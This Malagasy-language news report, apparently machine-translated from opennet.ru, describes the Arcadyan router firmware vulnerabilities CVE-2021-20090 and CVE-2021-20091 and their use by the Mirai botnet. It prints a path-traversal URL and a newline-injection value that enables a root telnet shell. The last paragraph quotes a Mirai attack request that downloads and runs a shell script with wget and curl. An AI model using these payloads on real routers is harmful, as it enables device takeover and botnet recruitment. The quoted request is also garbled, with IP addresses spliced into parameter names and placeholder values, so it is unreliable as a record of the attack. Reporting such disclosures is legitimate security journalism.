Ny vulnerability amin'ny router an-trano dia misy fiantraikany amin'ny mpanamboatra 17

Fanafihana goavana no voarakitra tao amin'ny tambajotra manohitra ny router an-trano izay mampiasa rindrambaiko HTTP server avy amin'ny orinasa Arcadyan. Mba hahazoana fifehezana ny fitaovana dia ampiasaina ny fitambaran'ny vulnerabilities roa izay ahafahana manatanteraka lavitra ny kaody tsy misy dikany miaraka amin'ny zon'ny faka. Ny olana dia misy fiantraikany amin'ny router ADSL marobe avy amin'ny Arcadyan, ASUS ary Buffalo, ary koa ny fitaovana atolotra eo ambanin'ny marika Beeline (ny olana dia voamarina ao amin'ny Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ary mpandraharaha telefaona hafa. Marihina fa efa nisy ny olana tao amin'ny firmware Arcadyan nandritra ny 10 taona mahery ary nandritra izany fotoana izany dia nahavita nifindra monina tany amin'ny modely fitaovana 20 farafahakeliny avy amin'ny mpanamboatra 17 samihafa.

Ny vulnerability voalohany, CVE-2021-20090, dia mamela ny fidirana amin'ny script amin'ny Internet tsy misy fanamarinana. Ny votoatin'ny vulnerability dia ny hoe ao amin'ny interface Internet, ny lahatahiry sasany izay handefasana sary, rakitra CSS ary script JavaScript dia azo idirana tsy misy fanamarinana. Amin'ity tranga ity, ny lahatahiry izay ahafahan'ny fidirana tsy misy fanamarinana dia voamarina amin'ny fampiasana ny saron-tava voalohany. Voasakan'ny firmware ny fanondroana tarehin-tsoratra β€œ../” amin'ny lalana mankany amin'ny lahatahirin'ny ray aman-dreny, fa ny fampiasana ny fitambaran'ny β€œ..%2f” kosa dia adino. Noho izany, azo atao ny manokatra pejy voaaro rehefa mandefa fangatahana toy ny β€œhttp://192.168.1.1/images/..%2findex.htm”.

Ny vulnerability faharoa, CVE-2021-20091, dia ahafahan'ny mpampiasa authenticated hanova ny rafitry ny fitaovana amin'ny alΓ lan'ny fandefasana mari-pamantarana voalamina manokana amin'ny script apply_abstract.cgi, izay tsy manamarina ny fisian'ny endri-tsoratra vaovao ao amin'ny paramΓ¨tre. . Ohatra, rehefa manao hetsika ping, ny mpanafika dia afaka mamaritra ny sanda "192.168.1.2%0AARC_SYS_TelnetdEnable=1" eo amin'ny saha miaraka amin'ny adiresy IP voamarika, ary ny script, rehefa mamorona ny fisie /tmp/etc/config/ .glbcfg, dia hanoratra ny tsipika β€œAARC_SYS_TelnetdEnable=1” ao anatiny ", izay manetsika ny mpizara telnetd, izay manome fidirana amin'ny akorandriaka tsy misy fetra miaraka amin'ny zon'ny faka. Toy izany koa, amin'ny fametrahana ny mari-pamantarana AARC_SYS, azonao atao ny manatanteraka ny code rehetra amin'ny rafitra. Ny vulnerability voalohany dia ahafahana mampandeha script misy olana tsy misy fanamarinana amin'ny alΓ lan'ny fidirana azy ho "/images/..%2fapply_abstract.cgi".

Mba hanararaotra ny vulnerabilities, ny mpanafika dia tsy maintsy afaka mandefa fangatahana any amin'ny seranan-tsambon'ny tambajotra izay iasan'ny interface tsara. Raha jerena amin'ny fihetsehan'ny fiparitahan'ny fanafihana, maro ireo mpandraharaha no mamela ny fidirana amin'ny fitaovany avy amin'ny tambajotra ivelany mba hanatsorana ny fitiliana ny olana amin'ny serivisy fanohanana. Raha voafetra amin'ny tambajotra anatiny ihany ny fidirana amin'ny interface, dia azo atao ny fanafihana avy amin'ny tambajotra ivelany amin'ny alΓ lan'ny teknika "DNS rebinding". Ny vulnerabilities dia efa ampiasaina mavitrika hampifandraisana ny router amin'ny botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Fifandraisana: akaiky User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX

Source: opennet.ru

Add a comment